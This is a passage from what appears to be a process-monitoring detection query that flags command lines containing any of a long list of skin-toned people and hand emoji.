"👦🏽" or ProcessCommandLine contains "👩🏽" or ProcessCommandLine contains "🧑🏽" or ProcessCommandLine contains "👨🏽" or ProcessCommandLine contains "👩🏽‍🦱" or ProcessCommandLine contains "🧑🏽‍🦱" or ProcessCommandLine contains "👨🏽‍🦱" or ProcessCommandLine contains "👩🏽‍🦰" or ProcessCommandLine contains "🧑🏽‍🦰" or ProcessCommandLine contains "👨🏽‍🦰" or ProcessCommandLine contains "👱🏽‍♀️" or ProcessCommandLine contains "👱🏽" or ProcessCommandLine contains "👱🏽‍♂️" or ProcessCommandLine contains "👩🏽‍🦳" or ProcessCommandLine contains "🧑🏽‍🦳" or ProcessCommandLine contains "👨🏽‍🦳" or ProcessCommandLine contains "👩🏽‍🦲" or ProcessCommandLine contains "🧑🏽‍🦲" or ProcessCommandLine contains "👨🏽‍🦲" or ProcessCommandLine contains "🧔🏽‍♀️" or ProcessCommandLine contains "🧔🏽" or ProcessCommandLine contains "🧔🏽‍♂️" or ProcessCommandLine contains "👵🏽" or ProcessCommandLine contains "🧓🏽" or ProcessCommandLine contains "👴🏽" or ProcessCommandLine contains "👲🏽" or ProcessCommandLine contains "👳🏽‍♀️" or ProcessCommandLine contains "👳🏽" or ProcessCommandLine contains "👳🏽‍♂️" or ProcessCommandLine contains "🧕🏽" or ProcessCommandLine contains "👮🏽‍♀️" or ProcessCommandLine contains "👮🏽" or ProcessCommandLine contains "👮🏽‍♂️" or ProcessCommandLine contains "👷🏽‍♀️" or ProcessCommandLine contains "👷🏽" or ProcessCommandLine contains "👷🏽‍♂️" or ProcessCommandLine contains "💂🏽‍♀️" or ProcessCommandLine contains "💂🏽" or ProcessCommandLine contains "💂🏽‍♂️" or ProcessCommandLine contains "🕵🏽‍♀️" or ProcessCommandLine contains "🕵🏽" or ProcessCommandLine contains "🕵🏽‍♂️" or ProcessCommandLine contains "👩🏽‍⚕️" or ProcessCommandLine contains "🧑🏽‍⚕️" or ProcessCommandLine contains "👨🏽‍⚕️" or ProcessCommandLine contains "👩🏽‍🌾" or ProcessCommandLine contains "🧑🏽‍🌾" or ProcessCommandLine contains "👨🏽‍🌾" or ProcessCommandLine contains "👩🏽‍🍳" or ProcessCommandLine contains "🧑🏽‍🍳" or ProcessCommandLine contains "👨🏽‍🍳" or ProcessCommandLine contains "👩🏽‍🎓" or ProcessCommandLine contains "🧑🏽‍🎓" or ProcessCommandLine contains "👨🏽‍🎓" or ProcessCommandLine contains "👩🏽‍🎤" or ProcessCommandLine contains "🧑🏽‍🎤" or ProcessCommandLine contains "👨🏽‍🎤" or ProcessCommandLine contains "👩🏽‍🏫" or ProcessCommandLine contains "🧑🏽‍🏫" or ProcessCommandLine contains "👨🏽‍🏫" or ProcessCommandLine contains "👩🏽‍🏭" or ProcessCommandLine contains "🧑🏽‍🏭" or ProcessCommandLine contains "👨🏽‍🏭" or ProcessCommandLine contains "👩🏽‍💻" or ProcessCommandLine contains "🧑🏽‍💻" or ProcessCommandLine contains "👨🏽‍💻" or ProcessCommandLine contains "👩🏽‍💼" or ProcessCommandLine contains "🧑🏽‍💼" or ProcessCommandLine contains "👨🏽‍💼" or ProcessCommandLine contains "👩🏽‍🔧" or ProcessCommandLine contains "🧑🏽‍🔧" or ProcessCommandLine contains "👨🏽‍🔧" or ProcessCommandLine contains "👩🏽‍🔬" or ProcessCommandLine contains "🧑🏽‍🔬" or ProcessCommandLine contains "👨🏽‍🔬" or ProcessCommandLine contains "👩🏽‍🎨" or ProcessCommandLine contains "🧑🏽‍🎨" or ProcessCommandLine contains "👨🏽‍🎨" or ProcessCommandLine contains "👩🏽‍🚒" or ProcessCommandLine contains "🧑🏽‍🚒" or ProcessCommandLine contains "👨🏽‍🚒" or ProcessCommandLine contains "👩🏽‍✈️" or ProcessCommandLine contains "🧑🏽‍✈️" or ProcessCommandLine contains "👨🏽‍✈️" or ProcessCommandLine contains "👩🏽‍🚀" or ProcessCommandLine contains "🧑🏽‍🚀" or ProcessCommandLine contains "👨🏽‍🚀" or ProcessCommandLine contains "👩🏽‍⚖️" or ProcessCommandLine contains "🧑🏽‍⚖️" or ProcessCommandLine contains "👨🏽‍⚖️" or ProcessCommandLine contains "👰🏽‍♀️" or ProcessCommandLine contains "👰🏽" or ProcessCommandLine contains "👰🏽‍♂️" or ProcessCommandLine contains "🤵🏽‍♀️" or ProcessCommandLine contains "🤵🏽" or ProcessCommandLine contains "🤵🏽‍♂️" or ProcessCommandLine contains "👸🏽" or ProcessCommandLine contains "🫅🏽" or ProcessCommandLine contains "🤴🏽" or ProcessCommandLine contains "🥷🏽" or ProcessCommandLine contains "🦸🏽‍♀️" or ProcessCommandLine contains "🦸🏽" or ProcessCommandLine contains "🦸🏽‍♂️" or ProcessCommandLine contains "🦹🏽‍♀️" or ProcessCommandLine contains "🦹🏽" or ProcessCommandLine contains "🦹🏽‍♂️" or ProcessCommandLine contains "🤶🏽" or ProcessCommandLine contains "🧑🏽‍🎄" or ProcessCommandLine contains "🎅🏽" or ProcessCommandLine contains "🧙🏽‍♀️" or ProcessCommandLine contains "🧙🏽" or ProcessCommandLine contains "🧙🏽‍♂️" or ProcessCommandLine contains "🧝🏽‍♀️" or ProcessCommandLine contains "🧝🏽" or ProcessCommandLine contains "🧝🏽‍♂️" or ProcessCommandLine contains "🧛🏽‍♀️" or ProcessCommandLine contains "🧛🏽" or ProcessCommandLine contains "🧛🏽‍♂️" or ProcessCommandLine contains "🧜🏽‍♀️" or ProcessCommandLine contains "🧜🏽" or ProcessCommandLine contains "🧜🏽‍♂️" or ProcessCommandLine contains "🧚🏽‍♀️" or ProcessCommandLine contains "🧚🏽" or ProcessCommandLine contains "🧚🏽‍♂️" or ProcessCommandLine contains "👼🏽" or ProcessCommandLine contains "🤰🏽" or ProcessCommandLine contains "🫄🏽" or ProcessCommandLine contains "🫃🏽" or ProcessCommandLine contains "🤱🏽" or ProcessCommandLine contains "👩🏽‍🍼" or ProcessCommandLine contains "🧑🏽‍🍼" or ProcessCommandLine contains "👨🏽‍🍼" or ProcessCommandLine contains "🙇🏽‍♀️" or ProcessCommandLine contains "🙇🏽" or ProcessCommandLine contains "🙇🏽‍♂️" or ProcessCommandLine contains "💁🏽‍♀️" or ProcessCommandLine contains "💁🏽" or ProcessCommandLine contains "💁🏽‍♂️" or ProcessCommandLine contains "🙅🏽‍♀️" or ProcessCommandLine contains "🙅🏽" or ProcessCommandLine contains "🙅🏽‍♂️" or ProcessCommandLine contains "🙆🏽‍♀️" or ProcessCommandLine contains "🙆🏽" or ProcessCommandLine contains "🙆🏽‍♂️" or ProcessCommandLine contains "🙋🏽‍♀️" or ProcessCommandLine contains "🙋🏽" or ProcessCommandLine contains "🙋🏽‍♂️" or ProcessCommandLine contains "🧏🏽‍♀️" or ProcessCommandLine contains "🧏🏽" or ProcessCommandLine contains "🧏🏽‍♂️" or ProcessCommandLine contains "🤦🏽‍♀️" or ProcessCommandLine contains "🤦🏽" or ProcessCommandLine contains "🤦🏽‍♂️" or ProcessCommandLine contains "🤷🏽‍♀️" or ProcessCommandLine contains "🤷🏽" or ProcessCommandLine contains "🤷🏽‍♂️" or ProcessCommandLine contains "🙎🏽‍♀️" or ProcessCommandLine contains "🙎🏽" or ProcessCommandLine contains "🙎🏽‍♂️" or ProcessCommandLine contains "🙍🏽‍♀️" or ProcessCommandLine contains "🙍🏽" or ProcessCommandLine contains "🙍🏽‍♂️" or ProcessCommandLine contains "💇🏽‍♀️" or ProcessCommandLine contains "💇🏽" or ProcessCommandLine contains "💇🏽‍♂️" or ProcessCommandLine contains "💆🏽‍♀️" or ProcessCommandLine contains "💆🏽" or ProcessCommandLine contains "💆🏽‍♂️" or ProcessCommandLine contains "🧖🏽‍♀️" or ProcessCommandLine contains "🧖🏽" or ProcessCommandLine contains "🧖🏽‍♂️" or ProcessCommandLine contains "💃🏽" or ProcessCommandLine contains "🕺🏽" or ProcessCommandLine contains "🕴🏽" or ProcessCommandLine contains "👩🏽‍🦽" or ProcessCommandLine contains "🧑🏽‍🦽" or ProcessCommandLine contains "👨🏽‍🦽" or ProcessCommandLine contains "👩🏽‍🦼" or ProcessCommandLine contains "🧑🏽‍🦼" or ProcessCommandLine contains "👨🏽‍🦼" or ProcessCommandLine contains "🚶🏽‍♀️" or ProcessCommandLine contains "🚶🏽" or ProcessCommandLine contains "🚶🏽‍♂️" or ProcessCommandLine contains "👩🏽‍🦯" or ProcessCommandLine contains "🧑🏽‍🦯" or ProcessCommandLine contains "👨🏽‍🦯" or ProcessCommandLine contains "🧎🏽‍♀️" or ProcessCommandLine contains "🧎🏽" or ProcessCommandLine contains "🧎🏽‍♂️" or ProcessCommandLine contains "🏃🏽‍♀️" or ProcessCommandLine contains "🏃🏽" or ProcessCommandLine contains "🏃🏽‍♂️" or ProcessCommandLine contains "🧍🏽‍♀️" or ProcessCommandLine contains "🧍🏽" or ProcessCommandLine contains "🧍🏽‍♂️" or ProcessCommandLine contains "👭🏽" or ProcessCommandLine contains "🧑🏽‍🤝‍🧑🏽" or ProcessCommandLine contains "👬🏽" or ProcessCommandLine contains "👫🏽" or ProcessCommandLine contains "🧗🏽‍♀️" or ProcessCommandLine contains "🧗🏽" or ProcessCommandLine contains "🧗🏽‍♂️" or ProcessCommandLine contains "🏇🏽" or ProcessCommandLine contains "🏂🏽" or ProcessCommandLine contains "🏌🏽‍♀️" or ProcessCommandLine contains "🏌🏽" or ProcessCommandLine contains "🏌🏽‍♂️" or ProcessCommandLine contains "🏄🏽‍♀️" or ProcessCommandLine contains "🏄🏽" or ProcessCommandLine contains "🏄🏽‍♂️" or ProcessCommandLine contains "🚣🏽‍♀️" or ProcessCommandLine contains "🚣🏽" or ProcessCommandLine contains "🚣🏽‍♂️" or ProcessCommandLine contains "🏊🏽‍♀️" or ProcessCommandLine contains "🏊🏽" or ProcessCommandLine contains "🏊🏽‍♂️" or ProcessCommandLine contains "⛹🏽‍♀️" or ProcessCommandLine contains "⛹🏽" or ProcessCommandLine contains "⛹🏽‍♂️" or ProcessCommandLine contains "🏋🏽‍♀️" or ProcessCommandLine contains "🏋🏽" or ProcessCommandLine contains "🏋🏽‍♂️" or ProcessCommandLine contains "🚴🏽‍♀️" or ProcessCommandLine contains "🚴🏽" or ProcessCommandLine contains "🚴🏽‍♂️" or ProcessCommandLine contains "🚵🏽‍♀️" or ProcessCommandLine contains "🚵🏽" or ProcessCommandLine contains "🚵🏽‍♂️" or ProcessCommandLine contains "🤸🏽‍♀️" or ProcessCommandLine contains "🤸🏽" or ProcessCommandLine contains "🤸🏽‍♂️" or ProcessCommandLine contains "🤽🏽‍♀️" or ProcessCommandLine contains "🤽🏽" or ProcessCommandLine contains "🤽🏽‍♂️" or ProcessCommandLine contains "🤾🏽‍♀️" or ProcessCommandLine contains "🤾🏽" or ProcessCommandLine contains "🤾🏽‍♂️" or ProcessCommandLine contains "🤹🏽‍♀️" or ProcessCommandLine contains "🤹🏽" or ProcessCommandLine contains "🤹🏽‍♂️" or ProcessCommandLine contains "🧘🏽‍♀️" or ProcessCommandLine contains "🧘🏽" or ProcessCommandLine contains "🧘🏽‍♂️" or ProcessCommandLine contains "🛀🏽" or ProcessCommandLine contains "🛌🏽" or ProcessCommandLine contains "👋🏾" or ProcessCommandLine contains "🤚🏾" or ProcessCommandLine contains "🖐🏾" or ProcessCommandLine contains "✋🏾" or ProcessCommandLine contains "🖖🏾" or ProcessCommandLine contains "👌🏾" or ProcessCommandLine contains "🤌🏾" or ProcessCommandLine contains "🤏🏾" or ProcessCommandLine contains "✌🏾" or ProcessCommandLine contains "🤞🏾" or ProcessCommandLine contains "🫰🏾" or ProcessCommandLine contains "🤟🏾" or ProcessCommandLine contains "🤘🏾" or ProcessCommandLine contains "🤙🏾" or ProcessCommandLine contains "🫵🏾" or ProcessCommandLine contains "🫱🏾" or ProcessCommandLine contains "🫲🏾" or ProcessCommandLine contains "🫳🏾" or ProcessCommandLine contains "🫴🏾" or ProcessCommandLine contains "👈🏾" or ProcessCommandLine contains "👉🏾" or ProcessCommandLine contains "👆🏾" or ProcessCommandLine contains "🖕🏾" or ProcessCommandLine contains "👇🏾" or ProcessCommandLine contains "☝🏾" or ProcessCommandLine contains "👍🏾" or ProcessCommandLine contains "👎🏾" or ProcessCommandLine contains "✊🏾" or ProcessCommandLine contains "👊🏾" or ProcessCommandLine contains "🤛🏾" or ProcessCommandLine contains "🤜🏾" or ProcessCommandLine contains "👏🏾" or ProcessCommandLine contains "🫶🏾" or ProcessCommandLine contains "🙌🏾" or ProcessCommandLine contains "👐🏾" or ProcessCommandLine contains "🤲🏾" or ProcessCommandLine contains "🙏🏾" or ProcessCommandLine contains "✍🏾" or ProcessCommandLine contains "💪🏾" or ProcessCommandLine contains "🦵🏾" or ProcessCommandLine contains "🦶🏾" or ProcessCommandLine contains "👂🏾" or ProcessCommandLine contains "🦻🏾" or ProcessCommandLine contains "👃🏾" or ProcessCommandLine contains "👶🏾" or ProcessCommandLine contains "👧🏾" or ProcessCommandLine contains "🧒🏾" or ProcessCommandLine contains "👦🏾" or ProcessCommandLine contains "👩🏾" or ProcessCommandLine contains "🧑🏾" or ProcessCommandLine contains "👨🏾" or ProcessCommandLine contains "👩🏾‍🦱" or ProcessCommandLine contains "🧑🏾‍🦱" or ProcessCommandLine contains "👨🏾‍🦱" or ProcessCommandLine contains "👩🏾‍🦰" or ProcessCommandLine contains "🧑🏾‍🦰" or ProcessCommandLine contains "👨🏾‍🦰" or ProcessCommandLine contains "👱🏾‍♀️" or ProcessCommandLine contains "👱🏾" or ProcessCommandLine contains "👱🏾‍♂️" or ProcessCommandLine contains "👩🏾‍🦳" or ProcessCommandLine contains "🧑🏾‍🦳" or ProcessCommandLine contains "👨🏾‍🦳" or ProcessCommandLine contains "👩🏾‍🦲" or ProcessCommandLine contains "🧑🏾‍🦲" or ProcessCommandLine contains "👨🏾‍🦲" or ProcessCommandLine contains "🧔🏾‍♀️" or ProcessCommandLine contains "🧔🏾" or ProcessCommandLine contains "🧔🏾‍♂️" or ProcessCommandLine contains "👵🏾" or ProcessCommandLine contains "🧓🏾" or ProcessCommandLine contains "👴🏾" or ProcessCommandLine contains "👲🏾" or ProcessCommandLine contains "👳🏾‍♀️" or ProcessCommandLine contains "👳🏾" or ProcessCommandLine contains "👳🏾‍♂️" or ProcessCommandLine contains "🧕🏾" or ProcessCommandLine contains "👮🏾‍♀️" or ProcessCommandLine contains "👮🏾" or ProcessCommandLine contains "👮🏾‍♂️" or ProcessCommandLine contains "👷🏾‍♀️" or ProcessCommandLine contains "👷🏾" or ProcessCommandLine contains "👷🏾‍♂️" or ProcessCommandLine contains "💂🏾‍♀️" or ProcessCommandLine contains "💂🏾" or ProcessCommandLine contains "💂🏾‍♂️" or ProcessCommandLine contains "🕵🏾‍♀️" or ProcessCommandLine contains "🕵🏾" or ProcessCommandLine contains "🕵🏾‍♂️" or ProcessCommandLine contains "👩🏾‍⚕️" or ProcessCommandLine contains "🧑🏾‍⚕️" or ProcessCommandLine contains "👨🏾‍⚕️" or ProcessCommandLine contains "👩🏾‍🌾" or ProcessCommandLine contains "🧑🏾‍🌾" or ProcessCommandLine contains "👨🏾‍🌾" or ProcessCommandLine contains "👩🏾‍🍳" or ProcessCommandLine contains "🧑🏾‍🍳" or ProcessCommandLine contains "👨🏾‍🍳" or ProcessCommandLine contains "👩🏾‍🎓" or ProcessCommandLine contains "🧑🏾‍🎓" or ProcessCommandLine contains "👨🏾‍🎓" or ProcessCommandLine contains "👩🏾‍🎤" or ProcessCommandLine contains "🧑🏾‍🎤" or ProcessCommandLine contains "👨🏾‍🎤" or ProcessCommandLine contains "👩🏾‍🏫" or ProcessCommandLine contains "🧑🏾‍🏫" or ProcessCommandLine contains "👨🏾‍🏫" or ProcessCommandLine contains "👩🏾‍🏭" or ProcessCommandLine contains "🧑🏾‍🏭" or ProcessCommandLine contains "👨🏾‍🏭" or ProcessCommandLine contains "👩🏾‍💻" or ProcessCommandLine contains "🧑🏾‍💻" or ProcessCommandLine contains "👨🏾‍💻" or ProcessCommandLine contains "👩🏾‍💼" or ProcessCommandLine contains "🧑🏾‍💼" or ProcessCommandLine contains "👨🏾‍💼" or ProcessCommandLine contains "👩🏾‍🔧" or ProcessCommandLine contains "🧑🏾‍🔧" or ProcessCommandLine contains "👨🏾‍🔧" or ProcessCommandLine contains "👩🏾‍🔬" or ProcessCommandLine contains "🧑🏾‍🔬" or ProcessCommandLine contains "👨🏾‍🔬" or ProcessCommandLine contains "👩🏾‍🎨" or ProcessCommandLine contains "🧑🏾‍🎨" or ProcessCommandLine contains "👨🏾‍🎨" or ProcessCommandLine contains "👩🏾‍🚒" or ProcessCommandLine contains "🧑🏾‍🚒" or ProcessCommandLine contains "👨🏾‍🚒" or ProcessCommandLine contains "👩🏾‍✈️" or ProcessCommandLine contains "🧑🏾‍✈️" or ProcessCommandLine contains "👨🏾‍✈️" or ProcessCommandLine contains "👩🏾‍🚀" or ProcessCommandLine contains "🧑🏾‍🚀" or ProcessCommandLine contains "👨🏾‍🚀" or ProcessCommandLine contains "👩🏾‍⚖️" or ProcessCommandLine contains "🧑🏾‍⚖️" or ProcessCommandLine contains "👨🏾‍⚖️" or ProcessCommandLine contains "👰🏾‍♀️" or ProcessCommandLine contains "👰🏾" or ProcessCommandLine contains "👰🏾‍♂️" or ProcessCommandLine contains "🤵🏾‍♀️" or ProcessCommandLine contains "🤵🏾" or ProcessCommandLine contains "🤵🏾‍♂️" or ProcessCommandLine contains "👸🏾" or ProcessCommandLine contains "🫅🏾" or ProcessCommandLine contains "🤴🏾" or ProcessCommandLine contains "🥷🏾" or ProcessCommandLine contains "🦸🏾‍♀️" or ProcessCommandLine contains "🦸🏾" or ProcessCommandLine contains "🦸🏾‍♂️" or ProcessCommandLine contains "🦹🏾‍♀️" or ProcessCommandLine contains "🦹🏾" or ProcessCommandLine contains "🦹🏾‍♂️" or ProcessCommandLine contains "🤶🏾" or ProcessCommandLine contains "🧑🏾‍🎄" or ProcessCommandLine contains "🎅🏾" or ProcessCommandLine contains "🧙🏾‍♀️" or ProcessCommandLine contains "🧙🏾" or ProcessCommandLine contains "🧙🏾‍♂️" or ProcessCommandLine contains "🧝🏾‍♀️" or ProcessCommandLine contains "🧝🏾" or ProcessCommandLine contains "🧝🏾‍♂️" or ProcessCommandLine contains "🧛🏾‍♀️" or ProcessCommandLine contains "🧛🏾" or ProcessCommandLine contains "🧛🏾‍♂️" or ProcessCommandLine contains "🧜🏾‍♀️" or ProcessCommandLine contains "🧜🏾" or ProcessCommandLine contains "🧜🏾‍♂️" or ProcessCommandLine contains "🧚🏾‍♀️" or ProcessCommandLine contains "🧚🏾" or ProcessCommandLine contains "🧚🏾‍♂️" or ProcessCommandLine contains "👼🏾" or ProcessCommandLine contains "🤰🏾" or ProcessCommandLine contains "🫄🏾" or ProcessCommandLine contains "🫃🏾" or ProcessCommandLine contains "🤱🏾" or ProcessCommandLine contains "👩🏾‍🍼" or ProcessCommandLine contains "🧑🏾‍🍼" or ProcessCommandLine contains "👨🏾‍🍼" or ProcessCommandLine contains "🙇🏾‍♀️" or ProcessCommandLine contains "🙇🏾" or ProcessCommandLine contains "🙇🏾‍♂️" or ProcessCommandLine contains "💁🏾‍♀️" or ProcessCommandLine contains "💁🏾" or ProcessCommandLine contains "💁🏾‍♂️" or ProcessCommandLine contains "🙅🏾‍♀️" or ProcessCommandLine contains "🙅🏾" or ProcessCommandLine contains "🙅🏾‍♂️" or ProcessCommandLine contains "🙆🏾‍♀️" or ProcessCommandLine contains "🙆🏾" or ProcessCommandLine contains "🙆🏾‍♂️" or ProcessCommandLine contains "🙋🏾‍♀️" or ProcessCommandLine contains "🙋🏾" or ProcessCommandLine contains "🙋🏾‍♂️" or ProcessCommandLine contains "🧏🏾‍♀️" or ProcessCommandLine contains "🧏🏾" or ProcessCommandLine contains "🧏🏾‍♂️" or ProcessCommandLine contains "🤦🏾‍♀️" or ProcessCommandLine contains "🤦🏾" or ProcessCommandLine contains "🤦🏾‍♂️" or ProcessCommandLine contains "🤷🏾‍♀️" or ProcessCommandLine contains "🤷🏾" or ProcessCommandLine contains "🤷🏾‍♂️" or ProcessCommandLine contains "🙎🏾‍♀️" or ProcessCommandLine contains "🙎🏾" or ProcessCommandLine contains "🙎🏾‍♂️" or ProcessCommandLine contains "🙍🏾‍♀️" or ProcessCommandLine contains "🙍🏾" or ProcessCommandLine contains "🙍🏾‍♂️" or ProcessCommandLine contains "💇🏾‍♀️" or ProcessCommandLine contains "💇🏾" or ProcessCommandLine contains "💇🏾‍♂️" or ProcessCommandLine contains "💆🏾‍♀️" or ProcessCommandLine contains "💆🏾" or ProcessCommandLine contains "💆🏾‍♂️" or ProcessCommandLine contains "🧖🏾‍♀️" or ProcessCommandLine contains "🧖🏾" or ProcessCommandLine contains "🧖🏾‍♂️" or ProcessCommandLine contains "💃🏾" or ProcessCommandLine contains "🕺🏾" or ProcessCommandLine contains "👩🏾‍🦽" or ProcessCommandLine contains "🧑🏾‍🦽" or ProcessCommandLine contains "👨🏾‍🦽" or ProcessCommandLine contains "👩🏾‍🦼" or ProcessCommandLine contains "🧑🏾‍🦼" or ProcessCommandLine contains "👨🏾‍🦼" or ProcessCommandLine contains "🚶🏾‍♀️" or ProcessCommandLine contains "🚶🏾" or ProcessCommandLine contains "🚶🏾‍♂️" or ProcessCommandLine contains "👩🏾‍🦯" or ProcessCommandLine contains "🧑🏾‍🦯" or ProcessCommandLine contains "👨🏾‍🦯" or ProcessCommandLine contains "🧎🏾‍♀️" or ProcessCommandLine contains "🧎🏾" or ProcessCommandLine contains "🧎🏾‍♂️" or ProcessCommandLine contains "🏃🏾‍♀️" or ProcessCommandLine contains "🏃🏾" or ProcessCommandLine contains "🏃🏾‍♂️" or ProcessCommandLine contains "🧍🏾‍♀️" or ProcessCommandLine contains "🧍🏾" or ProcessCommandLine contains "🧍🏾‍♂️" or ProcessCommandLine contains "👭🏾" or ProcessCommandLine contains "🧑🏾‍🤝‍🧑🏾" or ProcessCommandLine contains "👬🏾" or ProcessCommandLine contains "👫🏾" or ProcessCommandLine contains "🧗🏾‍♀️" or ProcessCommandLine contains "🧗🏾" or ProcessCommandLine contains "🧗🏾‍♂️" or ProcessCommandLine contains "🏇🏾" or ProcessCommandLine contains "🏂🏾" or ProcessCommandLine contains "🏌🏾‍♀️" or ProcessCommandLine contains "🏌🏾" or ProcessCommandLine contains "🏌🏾‍♂️" or ProcessCommandLine contains "🏄🏾‍♀️" or ProcessCommandLine contains "🏄🏾" or ProcessCommandLine contains "🏄🏾‍♂️" or ProcessCommandLine contains "🚣🏾‍♀️" or ProcessCommandLine contains "🚣🏾" or ProcessCommandLine contains "🚣🏾‍♂️" or ProcessCommandLine contains "🏊🏾‍♀️" or ProcessCommandLine contains "🏊🏾" or ProcessCommandLine contains "🏊🏾‍♂️" or ProcessCommandLine contains "⛹🏾‍♀️" or ProcessCommandLine contains "⛹🏾" or ProcessCommandLine contains "⛹🏾‍♂️" or ProcessCommandLine contains "🏋🏾‍♀️" or ProcessCommandLine contains "🏋🏾" or ProcessCommandLine contains "🏋🏾‍♂️" or ProcessCommandLine contains "🚴🏾‍♀️" or ProcessCommandLine contains "🚴🏾" or ProcessCommandLine contains "🚴🏾‍♂️" or ProcessCommandLine contains "🚵🏾‍♀️" or ProcessCommandLine contains "🚵🏾" or ProcessCommandLine contains "🚵🏾‍♂️" or ProcessCommandLine contains "🤸🏾‍♀️" or ProcessCommandLine contains "🤸🏾" or ProcessCommandLine contains "🤸🏾‍♂️" or ProcessCommandLine contains "🤽🏾‍♀️" or ProcessCommandLine contains "🤽🏾" or ProcessCommandLine contains "🤽🏾‍♂️" or ProcessCommandLine contains "🤾🏾‍♀️" or ProcessCommandLine contains "🤾🏾" or ProcessCommandLine contains "🤾🏾‍♂️" or ProcessCommandLine contains "🤹🏾‍♀️" or ProcessCommandLine contains "🤹🏾" or ProcessCommandLine contains "🤹🏾‍♂️" or ProcessCommandLine contains "🧘🏾‍♀️" or ProcessCommandLine contains "🧘🏾" or ProcessCommandLine contains "🧘🏾‍♂️" or ProcessCommandLine contains "🛀🏾" or ProcessCommandLine contains "🛌🏾" or ProcessCommandLine contains "👋🏿" or ProcessCommandLine contains "🤚🏿" or ProcessCommandLine contains "🖐🏿" or ProcessCommandLine contains "✋🏿" or ProcessCommandLine contains "🖖🏿" or ProcessCommandLine contains "👌🏿" or ProcessCommandLine contains "🤌🏿" or ProcessCommandLine contains "🤏🏿" or ProcessCommandLine contains "✌🏿" or ProcessCommandLine contains "🤞🏿" or ProcessCommandLine contains "🫰🏿" or ProcessCommandLine contains "🤟🏿" or ProcessCommandLine contains "🤘🏿" or ProcessCommandLine contains "🤙🏿" or ProcessCommandLine contains "🫵🏿" or ProcessCommandLine contains "🫱🏿" or ProcessCommandLine contains "🫲🏿" or ProcessCommandLine contains "🫳🏿" or ProcessCommandLine contains "🫴🏿" or ProcessCommandLine contains "👈🏿" or ProcessCommandLine contains "👉🏿" or ProcessCommandLine contains "👆🏿" or ProcessCommandLine contains "🖕🏿" or ProcessCommandLine contains "👇🏿" or ProcessCommandLine contains "☝🏿" or ProcessCommandLine contains "👍🏿" or ProcessCommandLine contains "👎🏿" or ProcessCommandLine contains "✊🏿" or ProcessCommandLine contains "👊🏿" or ProcessCommandLine contains "🤛🏿" or ProcessCommandLine contains "🤜🏿" or ProcessCommandLine contains "👏🏿" or ProcessCommandLine contains "🫶🏿" or ProcessCommandLine contains "🙌🏿" or ProcessCommandLine contains "👐🏿" or ProcessCommandLine contains "🤲🏿" or ProcessCommandLine contains "🙏🏿" or ProcessCommandLine contains "✍🏿" or ProcessCommandLine contains "🤳🏿" or ProcessCommandLine contains "💪🏿" or ProcessCommandLine contains "🦵🏿" or ProcessCommandLine contains "🦶🏿" or ProcessCommandLine contains "👂🏿" or ProcessCommandLine contains "🦻🏿" or ProcessCommandLine contains "👃🏿" or ProcessCommandLine contains "👶🏿" or ProcessCommandLine contains "👧🏿" or ProcessCommandLine contains "🧒🏿" or ProcessCommandLine contains "👦🏿" or ProcessCommandLine contains "👩🏿" or ProcessCommandLine contains "🧑🏿" or ProcessCommandLine contains "👨🏿" or ProcessCommandLine contains "👩🏿‍🦱" or ProcessCommandLine contains "🧑🏿‍🦱" or ProcessCommandLine contains "👨🏿‍🦱" or ProcessCommandLine contains "👩🏿‍🦰" or ProcessCommandLine contains "🧑🏿‍🦰" or ProcessCommandLine contains "👨🏿‍🦰" or ProcessCommandLine contains "👱🏿‍♀️" or ProcessCommandLine contains "👱🏿" or ProcessCommandLine contains "👱🏿‍♂️" or ProcessCommandLine contains "👩🏿‍🦳" or ProcessCommandLine contains "🧑🏿‍🦳" or ProcessCommandLine contains "👨🏿‍🦳" or ProcessCommandLine contains "👩🏿‍🦲" or ProcessCommandLine contains "🧑🏿‍🦲" or ProcessCommandLine contains "👨🏿‍🦲" or ProcessCommandLine contains "🧔🏿‍♀️" or ProcessCommandLine contains "🧔🏿" or ProcessCommandLine contains "🧔🏿‍♂️" or ProcessCommandLine contains "👵🏿" or ProcessCommandLine contains "🧓🏿" or ProcessCommandLine contains "👴🏿" or ProcessCommandLine contains "👲🏿" or ProcessCommandLine contains "👳🏿‍♀️" or ProcessCommandLine contains "👳🏿" or ProcessCommandLine contains "👳🏿‍♂️" or ProcessCommandLine contains "🧕🏿" or ProcessCommandLine contains "👮🏿‍♀️" or ProcessCommandLine contains "👮🏿" or ProcessCommandLine contains "👮🏿‍♂️" or ProcessCommandLine contains "👷🏿‍♀️" or ProcessCommandLine contains "👷🏿" or ProcessCommandLine contains "👷🏿‍♂️" or ProcessCommandLine contains "💂🏿‍♀️" or ProcessCommandLine contains "💂🏿" or ProcessCommandLine contains "💂🏿‍♂️" or ProcessCommandLine contains "🕵🏿‍♀️" or ProcessCommandLine contains "🕵🏿" or ProcessCommandLine contains "🕵🏿‍♂️" or ProcessCommandLine contains "👩🏿‍⚕️" or ProcessCommandLine contains "🧑🏿‍⚕️" or ProcessCommandLine contains "👨🏿‍⚕️" or ProcessCommandLine contains "👩🏿‍🌾" or ProcessCommandLine contains "🧑🏿‍🌾" or ProcessCommandLine contains "👨🏿‍🌾" or ProcessCommandLine contains "👩🏿‍🍳" or ProcessCommandLine contains "🧑🏿‍🍳" or ProcessCommandLine contains "👨🏿‍🍳" or ProcessCommandLine contains "👩🏿‍🎓" or ProcessCommandLine contains "🧑🏿‍🎓" or ProcessCommandLine contains "👨🏿‍🎓" or ProcessCommandLine contains "👩🏿‍🎤" or ProcessCommandLine contains "🧑🏿‍🎤" or ProcessCommandLine contains "👨🏿‍🎤" or ProcessCommandLine contains "👩🏿‍🏫" or ProcessCommandLine contains "🧑🏿‍🏫" or ProcessCommandLine contains "👨🏿‍🏫" or ProcessCommandLine contains "👩🏿‍🏭" or ProcessCommandLine contains "🧑🏿‍🏭" or ProcessCommandLine contains "👨🏿‍🏭" or ProcessCommandLine contains "👩🏿‍💻" or ProcessCommandLine contains "🧑🏿‍💻" or ProcessCommandLine contains "👨🏿‍💻" or ProcessCommandLine contains "👩🏿‍💼" or ProcessCommandLine contains "🧑🏿‍💼" or ProcessCommandLine contains "👨🏿‍💼" or ProcessCommandLine contains "👩🏿‍🔧" or ProcessCommandLine contains "🧑🏿‍🔧" or ProcessCommandLine contains "👨🏿‍🔧" or ProcessCommandLine contains "👩🏿‍🔬" or ProcessCommandLine contains "🧑🏿‍🔬" or ProcessCommandLine contains "👨🏿‍🔬" or ProcessCommandLine contains "👩🏿‍🎨" or ProcessCommandLine contains "🧑🏿‍🎨" or ProcessCommandLine contains "👨🏿‍🎨" or ProcessCommandLine contains "👩🏿‍🚒" or ProcessCommandLine contains 